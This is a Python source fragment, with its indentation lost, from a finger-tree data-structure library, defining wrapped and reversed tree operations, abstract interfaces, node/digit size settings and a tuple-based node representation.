def ___get_auto_info_from_node___(sf, depth, node, /):
'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
return type(sf.__ops).___get_auto_info_from_node___(sf.__ops, depth, node)
@override
def ___get_auto_info_from_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
return type(sf.__ops).___get_auto_info_from_digit___(sf.__ops, depth, digit)
@override
def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
return type(sf.__ops).___get_auto_info_from_line_tree___(sf.__ops, depth, line_tree)
@override
def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
return type(sf.__ops).___get_auto_info_from_deep_tree___(sf.__ops, depth, deep_tree)
@override
def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
return type(sf.__ops).___get_num_child_xnode_seq_of_node___(sf.__ops, depth, node)
@override
def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
return type(sf.__ops).___get_num_child_xnode_seq_of_digit___(sf.__ops, depth, digit)
@override
def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
return type(sf.__ops).___get_num_child_xnode_seq_of_line_tree___(sf.__ops, depth, line_tree)
@override
def ___careless_check_auto_info___(sf, auto_info, /):
'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
return type(sf.__ops).___careless_check_auto_info___(sf.__ops, auto_info)
@override
def careless_check_user_obj(sf, user_obj, /):
'obj{?user_obj} -> (None|raise)'
return sf.__ops.careless_check_user_obj(user_obj)
@override
def careless_check_element(sf, element, /):
'obj{?element} -> (None|raise)'
return sf.__ops.careless_check_element(element)
@override
def ___careless_check_depth_of_node___(sf, depth, node, /):
'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
return type(sf.__ops).___careless_check_depth_of_node___(sf.__ops, depth, node)
@override
def ___careless_check_depth_of_digit___(sf, depth, digit, /):
'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
return type(sf.__ops).___careless_check_depth_of_digit___(sf.__ops, depth, digit)
@override
def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
return type(sf.__ops).___careless_check_depth_of_line_tree___(sf.__ops, depth, line_tree)
@override
def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
return type(sf.__ops).___careless_check_depth_of_deep_tree___(sf.__ops, depth, deep_tree)
@override
def ___mk_element__calc_auto_info___(sf, user_obj, /):
'raw user_obj -> boxed element #see:mk_element'
return type(sf.__ops).___mk_element__calc_auto_info___(sf.__ops, user_obj)
@override
def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
return type(sf.__ops).___mk_node__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
@override
def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
return type(sf.__ops).___mk_digit__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
@override
def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
return type(sf.__ops).___mk_line_tree__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
@override
def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
return type(sf.__ops).___mk_deep_tree__not_auto___(sf.__ops, depth, ldigit, mtree, rdigit, auto_info)
@override
def ___unbox_element___(sf, element, /):
'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
return type(sf.__ops).___unbox_element___(sf.__ops, element)
@override
def ___unbox_node___(sf, depth, node, /):
'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
return type(sf.__ops).___unbox_node___(sf.__ops, depth, node)
@override
def ___unbox_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
return type(sf.__ops).___unbox_digit___(sf.__ops, depth, digit)
@override
def ___unbox_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
return type(sf.__ops).___unbox_line_tree___(sf.__ops, depth, line_tree)
@override
def ___unbox_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
return type(sf.__ops).___unbox_deep_tree___(sf.__ops, depth, deep_tree)
@override
def ___is_tree_line___(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
return type(sf.__ops).___is_tree_line___(sf.__ops, depth, tree)
#end of wrapper_impl_of_IFingerTreeOps
#end of overrides_of_WrappedFingerTreeOps
#end of class WrappedFingerTreeOps(IFingerTreeOps):
#HHHHH
class ReversedFingerTreeOps(WrappedFingerTreeOps):
r'''
reverse xnode_seq for input@___mk.../output@unbox...
flip lhs/rhs@monoid_ops<auto_info>
flip lhs/rhs@monoid_ops<measured_result>
to impl R by L @IFingerTreeOps:
may_ipopR__tree <<== may_ipopL__tree
ipushR__tree <<== ipushL__tree
isplitR__tree <<== isplitL__tree
join__??
#'''
def __init__(sf, finger_tree_ops, /):
super().__init__(finger_tree_ops)
if type(sf.__ops) is __class__: raise TypeError
sf.__rops4a = mk_ReversedMonoidOps(finger_tree_ops.get_monoid_ops4auto_info())
def __ops(sf, /):
return sf.get_original_finger_tree_ops()
#begin of overrides_of_ReversedFingerTreeOps
@override
def ___get_monoid_ops4auto_info___(sf, /):
'-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
'[modified]'; return sf.__rops4a
return type(sf.__ops).___get_monoid_ops4auto_info___(sf.__ops)
@override
def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
'[modified]'; return type(sf.__ops).___mk_node__not_auto___(sf.__ops, depth, tuple_reversed(xnode_seq), auto_info)
return type(sf.__ops).___mk_node__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
@override
def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
'[modified]'; return type(sf.__ops).___mk_digit__not_auto___(sf.__ops, depth, tuple_reversed(xnode_seq), auto_info)
return type(sf.__ops).___mk_digit__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
@override
def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
'[modified]'; return type(sf.__ops).___mk_line_tree__not_auto___(sf.__ops, depth, tuple_reversed(xnode_seq), auto_info)
return type(sf.__ops).___mk_line_tree__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
@override
def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
'[modified]'; return type(sf.__ops).___mk_deep_tree__not_auto___(sf.__ops, depth, rdigit, mtree, ldigit, auto_info)
return type(sf.__ops).___mk_deep_tree__not_auto___(sf.__ops, depth, ldigit, mtree, rdigit, auto_info)
@override
def ___unbox_node___(sf, depth, node, /):
'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
'[modified]'; (xnode_seq, auto_info) = type(sf.__ops).___unbox_node___(sf.__ops, depth, node); return (tuple_reversed(xnode_seq), auto_info)
return type(sf.__ops).___unbox_node___(sf.__ops, depth, node)
@override
def ___unbox_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
'[modified]'; (xnode_seq, auto_info) = type(sf.__ops).___unbox_digit___(sf.__ops, depth, digit); return (tuple_reversed(xnode_seq), auto_info)
return type(sf.__ops).___unbox_digit___(sf.__ops, depth, digit)
@override
def ___unbox_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
'[modified]'; (xnode_seq, auto_info) = type(sf.__ops).___unbox_line_tree___(sf.__ops, depth, line_tree); return (tuple_reversed(xnode_seq), auto_info)
return type(sf.__ops).___unbox_line_tree___(sf.__ops, depth, line_tree)
@override
def ___unbox_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
'[modified]'; (rdigit, mtree, ldigit, auto_info) = type(sf.__ops).___unbox_line_tree___(sf.__ops, depth, deep_tree); return (ldigit, mtree, rdigit, auto_info)
return type(sf.__ops).___unbox_deep_tree___(sf.__ops, depth, deep_tree)
#end of overrides_of_ReversedFingerTreeOps
#end of class ReversedFingerTreeOps(IFingerTreeOps):
r'''
def check_finger_tree_ops__part1__nens(finger_tree_ops:IFingerTreeOps, /):
check_instance(IFingerTreeOps, finger_tree_ops)
check_finger_tree_ops__setting(finger_tree_ops)
... ...
#'''
#HHHHH
r'''
step of making abstractmethod_decls_of_IFingerTreeOps
get abstractmethod decl
each abstractmethod decl occupy 3 lines
copy whole class body to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
^\(\s*@abstractmethod.*\)\n\(.*\)\n\(.*\)
.,$s//##?!\1\r##?!\2\r##?!\3
^\(##?!\)\@!.*\n
.,$s//
^\(##?!\)
.,$s//
#'''
#begin of abstractmethod_decls_of_IFingerTreeOps
class abstractmethod_decls_of_IFingerTreeOps(IFingerTreeOps):
##################################
##################################
######IFingerTreeOps__setting#####
##################################
##################################
@abstractmethod
def get_sorted_node_element_numbers(sf, /):
'-> sorted tuple<uint>'
@abstractmethod
def get_node_element_number_frozenset(sf, /):
'-> frozenset<uint>'
@abstractmethod
def get_min_max_digit_element_number_pair(sf, /):
'-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
@abstractmethod
def ___split_size__case_digit_seq_digit___(sf, sz, /):
'[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
@abstractmethod
def ___split_size__case_digit_seq___(sf, sz, /):
'[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
@abstractmethod
def ___split_size__case_seq___(sf, sz, /):
'[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
@abstractmethod
def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
##################################
##################################
###########IFingerTreeOps#########
##################################
##################################
##################################
@abstractmethod
def ___get_monoid_ops4auto_info___(sf, /):
'-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
@abstractmethod
def ___get_auto_info_from_element___(sf, element, /):
'element -> auto_info #see:get_auto_info_from_element'
@abstractmethod
def ___get_auto_info_from_node___(sf, depth, node, /):
'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
@abstractmethod
def ___get_auto_info_from_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
@abstractmethod
def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
@abstractmethod
def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
@abstractmethod
def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
@abstractmethod
def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
@abstractmethod
def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
@abstractmethod
def ___careless_check_auto_info___(sf, auto_info, /):
'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
@abstractmethod
def careless_check_user_obj(sf, user_obj, /):
'obj{?user_obj} -> (None|raise)'
@abstractmethod
def careless_check_element(sf, element, /):
'obj{?element} -> (None|raise)'
@abstractmethod
def ___careless_check_depth_of_node___(sf, depth, node, /):
'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
@abstractmethod
def ___careless_check_depth_of_digit___(sf, depth, digit, /):
'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
@abstractmethod
def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
@abstractmethod
def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
@abstractmethod
def ___mk_element__calc_auto_info___(sf, user_obj, /):
'raw user_obj -> boxed element #see:mk_element'
@abstractmethod
def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
@abstractmethod
def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
@abstractmethod
def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
@abstractmethod
def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
@abstractmethod
def ___unbox_element___(sf, element, /):
'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
@abstractmethod
def ___unbox_node___(sf, depth, node, /):
'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
@abstractmethod
def ___unbox_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
@abstractmethod
def ___unbox_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
@abstractmethod
def ___unbox_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
@abstractmethod
def ___is_tree_line___(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
#end of class abstractmethod_decls_of_IFingerTreeOps(IFingerTreeOps):
#end of abstractmethod_decls_of_IFingerTreeOps
#HHHHH
NamedTuple4FingerTreeOps__setting = namedtuple(
'NamedTuple4FingerTreeOps__setting', '''
sorted_nens
nen_set
min_max_den_pair
overflow_nen
may_ordered_nens
'''.split()
)
def mk_NamedTuple4FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
nen_set = frozenset(nens)
sorted_nens = tuple(sorted(nens))
return NamedTuple4FingerTreeOps__setting(sorted_nens ,nen_set ,min_max_den_pair ,overflow_nen ,may_ordered_nens)
def mk_FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
config = mk_NamedTuple4FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens)
finger_tree_ops__setting = FingerTreeOps__setting(config)
return finger_tree_ops__setting
def _mk_FingerTreeOps__setting(nens, min_max_den_pair, /):
nens = set(nens)
overflow_nen = max_nen = max(nens)
may_ordered_nens = None
finger_tree_ops__setting = mk_FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens)
return finger_tree_ops__setting
class FingerTreeOps__setting(IFingerTreeOps__setting):
'usage:subclass<IFingerTreeOps__wrapped_setting>(finger_tree_ops__setting:FingerTreeOps__setting)'
def __init__(sf, named_tuple4FingerTreeOps__setting:NamedTuple4FingerTreeOps__setting, /):
check_instance(NamedTuple4FingerTreeOps__setting, named_tuple4FingerTreeOps__setting)
sf.__config = named_tuple4FingerTreeOps__setting
sf.__helper = Helper4cut_uint_into_uints(sf.__config.nen_set)
may_ordered_nens = sf.__config.may_ordered_nens
if may_ordered_nens is not None:
ordered_nens = may_ordered_nens
check_tuple(ordered_nens)
check_all(check_int_ge2, ordered_nens)
nen_set = sf.__config.nen_set
check_len_of(ordered_nens, sz=len(nen_set))
if not set(ordered_nens) == nen_set: raise ValueError
check_finger_tree_ops__setting(sf)
## source from abstractmethod_decls_of_IFingerTreeOps
@override
def get_sorted_node_element_numbers(sf, /):
'-> sorted tuple<uint>'
return sf.__config.sorted_nens
@override
def get_node_element_number_frozenset(sf, /):
'-> frozenset<uint>'
return sf.__config.nen_set
@override
def get_min_max_digit_element_number_pair(sf, /):
'-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
return sf.__config.min_max_den_pair
@override
def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
return sf.__config.overflow_nen
r'''
Helper4cut_uint_into_uints
possible_parts_of
calc_lowerbound_of_inf_compact_domain_rng
cut_uint_into_uints__greedy
cut_uint_into_uints__greedy_last__ordered_part_uints
#'''
@override
def ___split_size__case_digit_seq_digit___(sf, sz, /):
'[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
may_ordered_nens = sf.__config.may_ordered_nens
nen2count = sf.__helper.cut_uint_into_uints__greedy_last__ordered_part_uints(may_ordered_nens, sz)
return nen2count
@override
def ___split_size__case_digit_seq___(sf, sz, /):
'[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
min_den, max_den = sf.get_min_max_digit_element_number_pair()
assert min_den <= sz
if sz <= max_den:
den = sz
nen2count = {}
else:
#recur:overflow_nen = sf.get_num_child_xnode_seq_of_new_node_when_push_overflow()
overflow_nen = sf._get_num_child_xnode_seq_of_new_node_when_push_overflow()
try_den = min_den
tsz = sz-try_den # >max_den-min_den >= max_nen >= overflow_nen
q, r = divmod(tsz, overflow_nen)
den = try_den + r # <= min_den+overflow_nen-1 <= min_den+max_nen-1 <= max_den-1
assert min_den <= den < max_den
nen2count = {overflow_nen:q}
return den, nen2count
@override
def ___split_size__case_seq___(sf, sz, /):
'[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
min_den, max_den = sf.get_min_max_digit_element_number_pair()
assert 2*min_den <= sz
if sz <= 2*max_den:
den2 = sz
nen2count = {}
else:
#recur:overflow_nen = sf.get_num_child_xnode_seq_of_new_node_when_push_overflow()
overflow_nen = sf._get_num_child_xnode_seq_of_new_node_when_push_overflow()
try_den2 = 2*min_den
tsz = sz-try_den2 # >2*(max_den-min_den) >= 2*max_nen >= 2*overflow_nen
q, r = divmod(tsz, overflow_nen)
den2 = try_den2 + r # <= 2*min_den+overflow_nen-1 <= 2*min_den+max_nen-1 <= min_den+max_den-1
assert 2*min_den <= den2 < min_den+max_den
nen2count = {overflow_nen:q}
assert 2*min_den <= den2 <= 2*max_den
small_den = den2//2
big_den = den2 - small_den
return small_den, big_den, nen2count
#end of class FingerTreeOps__setting(IFingerTreeOps__setting):
r'''
可选方案:
0: nd<-[2,3], dg <-[1..>=4]
1: nd<-[3,4], dg <-[3..>=7]
2: nd<-[2,5], dg <-[2..>=7]
3: nd<-[3,5], dg <-[4..>=9]
4: nd<-[3,4,5], dg <-[2..>=7]
5: nd<-[4,5,6,7], dg <-[2..>=9]
nd<-[4,5,6,7], dg <-[2..10]
2..5..7..10
#'''
finger_tree_ops__setting__2c3__1T4 \
= _mk_FingerTreeOps__setting({2,3}, (1,4))
finger_tree_ops__setting__3c4__3T7 \
= _mk_FingerTreeOps__setting({3,4}, (3,7))
finger_tree_ops__setting__2c5__2T7 \
= _mk_FingerTreeOps__setting({2,5}, (2,7))
finger_tree_ops__setting__3c5__4T9 \
= _mk_FingerTreeOps__setting({3,5}, (4,9))
finger_tree_ops__setting__3c4c5__2T7 \
= _mk_FingerTreeOps__setting({3,4,5}, (2,7))
finger_tree_ops__setting__4c5c6c7__2T9 \
= _mk_FingerTreeOps__setting({4,5,6,7}, (2,9))
finger_tree_ops__setting__4c5c6c7__2T10 \
= _mk_FingerTreeOps__setting({4,5,6,7}, (2,10))
finger_tree_ops__setting__2c3__1T4
finger_tree_ops__setting__3c4__3T7
finger_tree_ops__setting__2c5__2T7
finger_tree_ops__setting__3c5__4T9
finger_tree_ops__setting__3c4c5__2T7
finger_tree_ops__setting__4c5c6c7__2T9
finger_tree_ops__setting__4c5c6c7__2T10
class IFingerTreeOps__raw_mk_element(IFingerTreeOps):
r'''
@abstractmethod
def ___mk_element__not_auto___(sf, user_obj, auto_info, /):
'user_obj -> auto_info -> element #see:___mk_element__calc_auto_info___'
@abstractmethod
def ___calc_auto_info_from_user_obj___(sf, user_obj, /):
'user_obj -> auto_info #see:calc_auto_info_from_user_obj'
#'''
@abstractmethod
def ___mk_element__not_auto___(sf, user_obj, auto_info, /):
'user_obj -> auto_info -> element #see:___mk_element__calc_auto_info___'
@override
def ___mk_element__calc_auto_info___(sf, user_obj, /):
'raw user_obj -> boxed element #see:mk_element'
auto_info = sf.calc_auto_info_from_user_obj(user_obj)
element = type(sf).___mk_element__not_auto___(sf, user_obj, auto_info)
sf.careless_check_element(element)
return element
@abstractmethod
def ___calc_auto_info_from_user_obj___(sf, user_obj, /):
'user_obj -> auto_info #see:calc_auto_info_from_user_obj'
def calc_auto_info_from_user_obj(sf, user_obj, /):
'user_obj -> auto_info #see:___calc_auto_info_from_user_obj___'
sf.careless_check_user_obj(user_obj)
auto_info = type(sf).___calc_auto_info_from_user_obj___(sf, user_obj)
sf.careless_check_auto_info(auto_info)
return auto_info
#end of class IFingerTreeOps__raw_mk_element(IFingerTreeOps):
class IFingerTreeOps__cased_data(IFingerTreeOps__raw_mk_element):
'except:user_obj, auto_info'
case_name_of_element = 'element'
case_name_of_node = 'node'
case_name_of_digit = 'digit'
case_name_of_line_tree = 'line_tree'
case_name_of_deep_tree = 'deep_tree'
#IFingerTreeOps__raw_mk_element
@override
def ___mk_element__not_auto___(sf, user_obj, auto_info, /):
'user_obj -> auto_info -> element #see:___mk_element__calc_auto_info___'
return (sf.case_name_of_element, user_obj, auto_info)
# abstractmethod_decls_of_IFingerTreeOps
@override
def ___get_auto_info_from_element___(sf, element, /):
'element -> auto_info #see:get_auto_info_from_element'
return element[-1]
@override
def ___get_auto_info_from_node___(sf, depth, node, /):
'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
return node[-1]
@override
def ___get_auto_info_from_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
return digit[-1]
@override
def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
return line_tree[-1]
@override
def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
return deep_tree[-1]
@override
def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
return len(node[2])
@override
def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
return len(digit[2])
@override
def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
return len(line_tree[2])
@override
def careless_check_element(sf, element, /):
'obj{?element} -> (None|raise)'
check_cased_tuple(sf.case_name_of_element, 3, element)
@override
def ___careless_check_depth_of_node___(sf, depth, node, /):
'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
check_cased_tuple__with_depth(sf.case_name_of_node, 4, depth, node)
@override
def ___careless_check_depth_of_digit___(sf, depth, digit, /):
'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
check_cased_tuple__with_depth(sf.case_name_of_digit, 4, depth, digit)
@override
def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
check_cased_tuple__with_depth(sf.case_name_of_line_tree, 4, depth, line_tree)
@override
def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
check_cased_tuple__with_depth(sf.case_name_of_deep_tree, 6, depth, deep_tree)
@override
def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
return (sf.case_name_of_node, depth, xnode_seq, auto_info)
@override
def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
return (sf.case_name_of_digit, depth, xnode_seq, auto_info)
@override
def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
return (sf.case_name_of_line_tree, depth, xnode_seq, auto_info)
@override
def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
return (sf.case_name_of_deep_tree, depth, ldigit, mtree, rdigit, auto_info)
@override
def ___unbox_element___(sf, element, /):
'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
return element[1:]
@override
def ___unbox_node___(sf, depth, node, /):
'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
return node[2:]
@override
def ___unbox_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
return digit[2:]
@override
def ___unbox_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
return line_tree[2:]
@override
def ___unbox_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
return deep_tree[2:]
@override
def ___is_tree_line___(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
check_union_of_cased_tuples({sf.case_name_of_line_tree:4, sf.case_name_of_deep_tree:6}, tree)
is_deep_tree = tree[0] == sf.case_name_of_deep_tree
if is_deep_tree:
deep_tree = tree
check_cased_tuple__with_depth(sf.case_name_of_deep_tree, 6, depth, deep_tree)
else:
line_tree = tree
check_cased_tuple__with_depth(sf.case_name_of_line_tree, 4, depth, line_tree)
return not is_deep_tree
#end of class IFingerTreeOps__cased_data(IFingerTreeOps__raw_mk_element):
abstractmethod_decls_of_IFingerTreeOps
#
def check_cased_tuple__with_depth(case_name, sz, depth, obj, /):
check_int_ge2(sz)
check_uint(depth)
check_cased_tuple(case_name, sz, obj)
tpl2s = obj
check_uint(tpl2s[1])
if tpl2s[1] != depth: raise TypeError
def _do_nothing(x, /):pass
class FingerTreeOps__funcs(IFingerTreeOps__cased_data, IFingerTreeOps__wrapped_setting):
def __init__(sf, finger_tree_ops__setting:IFingerTreeOps__setting, monoid_ops4auto_info:IMonoidOps, /,*, calc_auto_info_from_user_obj, careless_check_user_obj):
if careless_check_user_obj is None:
careless_check_user_obj = _do_nothing
check_instance(IMonoidOps, monoid_ops4auto_info)
check_callable(calc_auto_info_from_user_obj)
check_callable(careless_check_user_obj)
sf._monoid_ops4auto_info = monoid_ops4auto_info
sf._calc_auto_info_from_user_obj = calc_auto_info_from_user_obj
sf._careless_check_user_obj = careless_check_user_obj
#sf._finger_tree_ops__setting = finger_tree_ops__setting
super().__init__(finger_tree_ops__setting)
@override
def ___careless_check_auto_info___(sf, auto_info, /):
'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
return
@override
def ___get_monoid_ops4auto_info___(sf, /):
'-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
return sf._monoid_ops4auto_info
@override
def ___calc_auto_info_from_user_obj___(sf, user_obj, /):
'user_obj -> auto_info #see:calc_auto_info_from_user_obj'
return sf._calc_auto_info_from_user_obj(user_obj)
@override
def careless_check_user_obj(sf, user_obj, /):
'obj{?user_obj} -> (None|raise)'
return sf._careless_check_user_obj(user_obj)
pass
#end of class FingerTreeOps__funcs(IFingerTreeOps__cased_data, IFingerTreeOps__wrapped_setting):
